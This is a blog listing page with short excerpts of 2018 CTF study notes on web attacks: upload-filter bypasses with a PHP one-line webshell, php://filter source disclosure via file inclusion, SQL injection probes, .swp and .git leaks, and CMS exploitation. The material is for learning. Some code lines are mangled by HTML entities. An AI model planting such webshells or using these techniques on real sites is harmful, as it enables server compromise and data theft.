- 博客(10)
- 收藏
- 关注
原创 CTF--文件上传
.php上传被过滤时可以用的别名:php2, php3, php4, php5, phps, pht, phtm, phtml可以上传的.php文件思路(1)一句话木马:<?phpeval(POST[′a′]);?&gt;(2)绕过过滤方式1:&lt;scriptlanguage=&quot;pHp&quot;&gt;@eval(_POST[&...
2018-11-27 09:36:33 2351
原创 CTF--文件包含
(1)文件包含漏洞 原理:.php文件可能在前台显示不出来(php://filter过滤读取源代码,如URL:xxxx/index.php?file=show.php)方法:先让文件转化为base64格式然后再输出例:xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=index.php...
2018-11-27 09:36:09 2019
原创 CTF--图片
(1)图片为base64编码解释:一般图片为一个url,通过多次访问服务器下载图片;base64图片则将图片base64编码写入url;即ctrl+u看源码后有一堆base64编码用法:则可以将非图片的文件进行编码,然后发送给浏览器例:正常的http:///index.php?jpg=hei.jpg漏洞的http:///index.php?jpg=index.php...
2018-11-27 09:35:47 458
原创 CTF--代码审计
思路:(1)将源码中的过滤方式反向使用例:源码–login=unserialize(gzuncompress(base64decode(login = unserialize(gzuncompress(base64_decode(login=unserialize(gzuncompress(base64decode(requset[‘token’])));绕过–b=base64encode...
2018-11-27 09:35:20 587
原创 CTF--Vim文件泄露(.swp备份文件)
漏洞出现提示:(1)源码中出现思路:说明可能存在.swp备份文件,正常URL:xxx/index.php则尝试URL:xxx/index.php.swp下载.swp文件代码并使用vim打开,打开命令:vim -r index.php.swp打开后则发现源码,进行代码审计...
2018-11-27 09:33:23 11092
原创 CTF--SQL注入
SQL注入思路:1.是否存在SQL注入测试方法:(1)使用单引号’ (2)sqlmap:sqlmap.py -u http://*******2.判断过滤的字符SQL注入方式:(1)单引号’ (2)or/and 1=1 (3)order by --猜测字段长度(&&与||绕过过滤) 例:order by 1…SQL绕过过滤方式:(1)某一关键字被过滤:1...
2018-11-27 09:31:46 392
原创 CTF--Git漏洞
思路:awvs扫描网站后发现存在git文件夹后使用githackgithack使用方法:在githack目录下 python GitHack.py http://*******/.git(注意git前一般有个点)运行完成后在githack目录下生成目标文件夹...
2018-11-27 09:29:33 1640
原创 CTF--CMS漏洞总结
CMS漏洞总结CMS类型题目:首先判断CMS类型,再查询该CMS曾经出现的漏洞,利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入;或者上传一句话木马后使用菜刀连接,可能再连接数据库。(1)CMSEASY类型可用公开漏洞网站:https://www.seebug.org/appdir/CmsEasy1.cmseasy 无限制报错注入步骤:向http://*****/cel...
2018-11-27 09:28:01 13015
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人